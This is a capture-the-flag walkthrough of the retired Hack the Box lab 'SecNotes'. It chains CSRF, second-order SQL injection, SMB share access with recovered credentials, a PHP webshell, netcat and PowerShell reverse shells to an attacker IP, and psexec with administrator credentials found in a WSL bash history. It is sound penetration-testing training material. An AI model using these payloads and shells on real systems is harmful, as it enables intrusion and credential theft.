htb-secnotes-nl

Today we are going to solve another CTF challenge “SecNotes” which is available online for those who want to increase their skill in penetration testing and black box testing. SecNotes is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Medium

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.97 so let’s begin with nmap port enumeration.

c:\PENTEST>nmap -sC -sV 10.10.10.97
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-21 18:18 W. Europe Standard Time
Nmap scan report for 10.10.10.97
Host is up (0.022s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h36m34s, deviation: 4h37m08s, median: -3m26s
| smb-os-discovery:
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2019-01-21T09:15:49-08:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-01-21 18:15:51
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.69 seconds

c:\PENTEST>

After registering an account and gaining access to the web application, additional functionality to create notes, change password and a contact form are available. The user “tyler” is referenced.
Vulnerability Validation
Weak Password Change Mechanism
A common issue with password change mechanisms is a failure to validate that the user knows the existing password. Password recovery mechanisms also allow users to change their password without knowing the existing password, but may require an additional verification step,
such as sending the reset request to the email address associated with the username. If a malicious user gets a victim to click on a malicious password change request, and validation of the existing password is not required, then they may be able to take control of the account.

Cross-Site Request Forgery (CSRF)
The "Contact Us" form is directed to tyler, and if a malicious password reset request is sent to this user, they might click the link. CSRF tokens would defend against this attack, but they haven’t been implemented in the web application. In Burp, the "Change Password" request type is
changed from POST to GET, and the malicious URL is constructed.
http://10.10.10.97/change_pass.php?password=123456&confirm_password=123456
sword&submit=submit
The URL is pasted into the message body of the Contact request, and after a short while the credentials tyler:123456 can be used to log into the website.
Once logged in, credentials to access a SMB share are found.

.

 

Second-Order SQL Injection
Access to the SMB credentials can also be gained by bypassing the authentication mechanism.
The website is tested for SQL vulnerabilities. A number of authentication bypass payloads are
selected the from the SecLists Generic-SQLi list.
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Generic-SQLi.txt
‘ or 0=0 —
‘ or 0=0 #
‘ or 0=0 #”
‘ or ‘1’=’1′ —
‘ or 1 –‘
‘ or 1=1 —
‘ or 1=1 or ”=’
‘ or 1=1 or “”=
‘ or a=a —
‘ or a=a
‘) or (‘a’=’a
‘hi’ or ‘x’=’x’;
The login request is sent to the Burp Intruder module (CTRL + I), but this test is not successful.

The register page is tested next, and a payload of ‘ or 1=1– returns the result “This username is already taken”. Other payloads seem to have been accepted and registered as valid user accounts.

We tried inserting SQL injection queries in login form and nothing showed up. Then we tried inserting 2nd order SQL injection which is nothing but inserting SQL injection queries on the sign up form itself hoping that the server side script shows any unusual behavior and reveals some database information.

According to PortSwigger: “Second-order SQL injection arises when user-supplied data is stored by the application and later incorporated into SQL queries in an unsafe way. To detect the vulnerability, it is normally necessary to submit suitable data in one location, and then use some other application function that processes the data in an unsafe way.

The query that we used was:

Username: ' or 1='1
Password: ' or 1='1
Confirm password: ' or 1='1

It hit successfully and opened up a user account. Seemed like the heading was causing this 2nd order SQLi vulnerability. But it solved our purpose and gave us three notes from the database. The third one had something that seemed like the username and password of a service.

Tyler seems to be a person responsible for people’s queries. After obtaining Tyler’s password the first guess was logging into SMB server running on port 445.

Foothold SMB Share Access
The details are used to access the “new-site” share, which seems to be the IIS webroot

root@kali:~/htb# smbclient //secnotes.htb/new-site -U "tyler"
Enter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*&
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Aug 19 14:06:14 2018
.. D 0 Sun Aug 19 14:06:14 2018
iisstart.htm A 696 Thu Jun 21 11:26:03 2018
iisstart.png A 98757 Thu Jun 21 11:26:03 2018

12978687 blocks of size 4096. 8118293 blocks available

Write access is possible, and a minimal PHP webshell puckie.php with the contents below is uploaded

<?php echo shell_exec($_GET["cmd"]); ?>

viewing user.txt

http://10.10.10.97:8808/puckie.php?cmd=type%20c:\users\tyler\desktop\user.txt
6fa*****4f3

Upgrade Webshell to Reverse Shell
In order to get a proper shell, the “Invoke-PowerShellTcp.ps1” PowerShell script from the Nishang can be used.
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
The following command is used to execute the reverse shell payload.

http://10.10.10.97:8808/puckiestyle.php?cmd=powershell%20-ep%20bypass%20.\puckieshell443.ps1

or with netcat (instead of Nishang)

root@kali:~/htb# curl 10.10.10.97:8808/puckiestyle.php?cmd=nc+-e+cmd.exe+10.10.14.5+9001
root@kali:~/htb# rlwrap nc -lvp 9001
listening on [any] 9001 ...
connect to [10.10.14.5] from secnotes.htb [10.10.10.97] 49722
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\new-site>whoami
whoami
secnotes\tyler

This is encoded in Burp (CTRL+U), the request is sent and a shell as SECNOTES\tyler is received.

C:\pentest>runas /netonly /user:secnotes.htb\tyler cmd
Enter the password for secnotes.htb\tyler:92g!mA8BGjOirkL%OG*&
Attempting to start cmd as user "secnotes.htb\tyler" ...

C:\pentest>

cmd [running as secnotes.htb\tyler)
C:\Windows\system32>dir \\10.10.10.97\new-site
Volume in drive \\10.10.10.97\new-site has no label.
Volume Serial Number is 9CDD-BADA

Directory of \\10.10.10.97\new-site

21/01/2019 10:22 <DIR> .
21/01/2019 10:22 <DIR> ..
21/06/2018 16:26 696    iisstart.htm
21/06/2018 16:26 98.757 iisstart.png
2 File(s) 99.453 bytes
2 Dir(s) 33.213.988.864 bytes free

c:\PENTEST>copy puckie.php \\10.10.10.97\new-site
1 file(s) copied.

c:\PENTEST>copy puckieshell443.ps1 \\10.10.10.97\new-site
1 file(s) copied.

c:\PENTEST>dir \\10.10.10.97\new-site
Volume in drive \\10.10.10.97\new-site has no label.
Volume Serial Number is 9CDD-BADA

Directory of \\10.10.10.97\new-site

21/01/2019 16:02 <DIR> .
21/01/2019 16:02 <DIR> ..
21/06/2018 16:26 696    iisstart.htm
21/06/2018 16:26 98.757 iisstart.png
21/01/2019 10:19 44     puckie.php
21/01/2019  14:05 4.401 puckieshell443.ps1
4 File(s) 99.497 bytes
2 Dir(s) 33.213.988.864 bytes free

c:\PENTEST>

netcat listener

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.97: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.97] 49791: NO_DATA
ls
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\new-site>

Directory: C:\inetpub\new-site

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2018 8:26 AM 696   iisstart.htm
-a---- 6/21/2018 8:26 AM 98757 iisstart.png
-a---- 1/21/2019 1:19 AM 44    puckie.php
-a---- 1/21/2019 5:05 AM 4401  puckieshell443.ps1

Privilege Escalation
Discovery of Administrator Password
Enumeration of the C:\ reveals the file “Ubuntu.zip” and a “Distros\Ubuntu” folder. Potentially
Windows Subsystem for Linux (WSL) has been installed?
In order to check if WSL has been installed, the following command is issued.

PS C:\> Get-ChildItem HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss


Hive: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Lxss


Name Property
---- --------
{02893575-609c-4e3b-a426-00f9d State : 1
9b271da} DistributionName : Ubuntu-18.04
Version : 1
BasePath : C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18
.04onWindows_79rhkp1fndgsc\LocalState
PackageFamilyName : CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc

This confirms that WSL has been installed, and the Linux filesystem has been installed to the path as shown above

The Linux filesystem is enumerated. The “.bash_history” file is checked, and administrative credentials are discovered.

PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs> cd root
PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> ls

Directory: C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalStat
e\rootfs\root


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/22/2018 2:56 AM filesystem
-a---- 6/22/2018 3:09 AM 3112 .bashrc
-a---- 6/22/2018 2:41 PM 398 .bash_history
-a---- 6/21/2018 6:00 PM 148 .profile


PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root>
> cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit
PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root>

The same enumeration can also be carried out using bash.

bash -c "whoami;hostname"
bash -c "ls -al /root"
bash -c "cat /root/.bash_history"

A SYSTEM shell can be gained using psexec

C:\Users\jacco>psexec.exe \\10.10.10.97 -u SECNOTES\Administrator cmd.exe

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Password:u6!4ZwgwOM#^OBf#Nwnh

Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
secnotes\administrator
root@kali:~/htb# psexec.py Administrator@10.10.10.97 
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password: u6!4ZwgwOM#^OBf#Nwnh
[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file FtHMilUj.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service gSOW on 10.10.10.97.....
[*] Starting service gSOW.....

[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

Author: Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *